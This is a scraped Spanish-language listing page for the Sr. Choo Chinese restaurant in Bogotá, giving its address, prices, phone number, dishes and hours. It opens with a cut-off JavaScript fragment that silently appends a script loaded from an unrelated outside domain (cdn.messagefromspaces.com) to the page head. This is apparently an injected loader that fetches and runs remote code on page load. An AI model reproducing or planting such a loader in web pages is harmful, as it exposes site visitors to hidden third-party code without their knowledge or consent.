, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Sr. Choo.

Dirección: Carrera 13 No. 83-34 – Zona Rosa
Zona:
Otros
Precio Promedio Plato por Persona: 
Entre 30.000  y 50.000 pesos
Formas de Pago:  
Recibe Todas las  Tarjetas
TELÉFONO DE RESERVAS:   744 90 97

Categoría: Chino

Ubicado en una de las mejores zonas gastronómicas de la ciudad, se inauguró un nuevo restaurante con lo mejor de la cocina china: Sr Choo. Bajo la experiencia de los chef Said Shedehah y Hans Chiang de Le Cordon Bleu College Of Culinary Arts in Miami, Sr Choo te trae los sabores más representativos de esta potencia mundial.

La especialidad de la casa es el Pato Beijín o Pekín al estilo emperador, una preparación que por más de siete siglos ha estado en la mesa de este imperio. Su carne es importada directamente desde China para posteriormente ser laqueada con miel y asada en un horno especial.

Otro de los recomendados es el Cordero al estilo Xinjian o el Sr. Choo Imperial Chow mein una de los platos de la casa preparado a base de lomo de cerdo, pollo camarones, vegetales, calamares y chorizos chinos al wok y si quieres algo más clásico pero igual de rico, en la carta podrás encontrar variedad de arroces siempre acompañados de un buen vino o un licor.

Horarios:
Lunes a Sábado de 12:00 p.m. a 10:00 p.m.
Domingos de 12:00 p.m. a 9:30 p.m.

Comedor

Sr. Choo

Deja un comentario